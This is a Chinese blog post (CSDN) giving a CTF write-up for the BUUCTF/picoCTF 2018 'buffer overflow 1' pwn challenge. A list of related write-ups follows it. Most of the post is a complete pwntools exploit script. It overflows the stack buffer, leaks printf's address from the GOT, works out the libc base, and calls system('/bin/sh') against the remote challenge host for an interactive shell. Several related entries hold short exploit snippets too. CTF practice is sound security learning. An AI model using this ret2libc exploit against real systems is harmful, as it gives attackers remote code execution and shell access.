BUUCTF pwn——PicoCTF_2018_buffer_overflow 1

最新推荐文章于 2024-09-01 20:56:28 发布
最新推荐文章于 2024-09-01 20:56:28 发布
阅读量111 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/130654919
版权

checksec && 运行

在这里插入图片描述

ida

main函数里没啥信息

在这里插入图片描述

vuln可以溢出

在这里插入图片描述

给输入分配的栈空间为0x28

在这里插入图片描述

利用思路

ret2libc

代码

'''
@Author       : 白银
@Date         : 2023-05-13 09:06:09
@LastEditors  : 白银
@LastEditTime : 2023-05-13 10:28:36
@FilePath     : /pwn/PicoCTF_2018_buffer_overflow_1.py
@Description  : https://buuoj.cn/challenges#picoctf_2018_buffer%20overflow%201
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
from libcfind import *

set_arch = 2  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './PicoCTF_2018_buffer_overflow_1'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 26980)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        # libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        libc = ELF('/home/usrname/Desktop/2.27x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    libc = elf.libc
    # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

padding = 0x2c # ida看,s上限和r差多少
printf_plt = elf.plt['printf']
print("printf_plt------", hex(printf_plt))
printf_got = elf.got['printf']
print("printf_got------", hex(printf_got))
return_addr = elf.symbols['main']
print("return_addr------", hex(return_addr))
# return_addr = 0x804844b

payload = flat(['a' * padding ,printf_plt, return_addr, printf_got])
io.recvuntil("Please enter your string: \n")
io.sendline(payload)

io.recvuntil('0x8048420\n')

printf_addr = u32(io.recv(4))# x86一个指针占4字节
print("printf_addr------", hex(printf_addr))
    
libc = finder('printf', printf_addr)
libc_base = printf_addr - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
# bin_sh_addr = 0x80487C3 # 直接用程序的sh字符,他会将shell字符整个发过去

payload2 = flat(['a' * padding, system_addr, 0xdeadbeef, bin_sh_addr]) # x86在函数和参数之间要占位符

io.sendline(payload2)

io.interactive()

拿到shell,cat flag

在这里插入图片描述

Captain杰派罗
关注
专栏目录
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 283
BUUCTF 做题练习
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 463
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
PicoCTF_2018_buffer_overflow_1
m0sway的博客
11-28 450
PicoCTF_2018_buffer_overflow_1 使用checksec查看: 保护机制全关,看起来没啥难度。 扔进IDA中查看: 主函数中给出了漏洞函数,跟进查看: gets()函数,栈溢出,s距离ebp0x28 查看下这题的字符串可以发现函数win(): 能够直接获取到flag,直接秒了这题。 exp: from pwn import * #start # r = process("../buu/PicoCTF_2018_buffer_overflow_1") r = remote
BUUCTFPicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1384
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
picoctf-2018-buffer-overflow-1
最新发布
m0_73743784的博客
09-01 329
非常简单的ret2text,但是其他的信息稍微有点多。
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1
Y_peak的博客
03-16 343
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()
[BUUCTF]PWN——picoctf_2018_buffer overflow 1
BangSen1的博客
03-20 319
picoctf_2018_buffer overflow 1 例行检查,32位,没开启保护 运行一下 用IDA打开,检索字符串,看到了flag.txt,跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr)
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1017
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 363
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTFpicoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1313
BUUCTFpicoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
picoctf_2018_buffer overflow 1
个人笔记
04-26 114
【代码】picoctf_2018_buffer overflow 1。
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 347
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
picoctf Pwn buffer overflow 1
MrTreebook的博客
04-04 236
picoctf Pwn buffer overflow 11.IDA反编译看一下2.checksec检查3.检查后门函数4.看一下vuln函数5.利用思路6.exp 1.IDA反编译看一下 2.checksec检查 3.检查后门函数 4.看一下vuln函数 5.利用思路 在vuln函数中有一个gets()函数可以溢出 将放回地址覆盖成win()函数的地址即可 没有canary和pie的保护利用起来非常简单 6.exp from pwn import * p = remote("saturn.pi
[BUUCTF]PWN——picoctf_2018_buffer overflow 1/2
mcmuyanga的博客
11-07 492
picoctf_2018_buffer overflow 1 附件 步骤: 例行检查,32位程序,没开保护 本地运行一下程序,看看程序大概的执行情况 32位ida载入,习惯性的检查程序里的字符串,发现有flag.txt,跟进,找到了读出flag的函数,win_addr=0x80485CB 根据运行时看到的字符串找到了输入点 gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import * r=remote('node3.buuoj.cn',27200) win_a
BUUCTF picoctf_2018_buffer overflow 2
qq_51821131的博客
10-05 1434
picoctf_2018_buffer overflow 2 检查保护,且为32位 明显栈溢出 找到win函数可以打印flag 整合思路,栈溢出,向win函数传入参数并满足条件即可 from pwn import * p=remote('node4.buuoj.cn',25086) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./PicoCTF_2018_buffer_overflow_2') win=0x080485CB a1=0xDE
PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)
seaaseesa的博客
05-01 869
PicoCTF_2018_buffer_overflow_3 用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。 由于文件内容不变,所以,我们可以直接爆破。 #coding:utf8 from pwn import * shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, passwor...
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 359
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值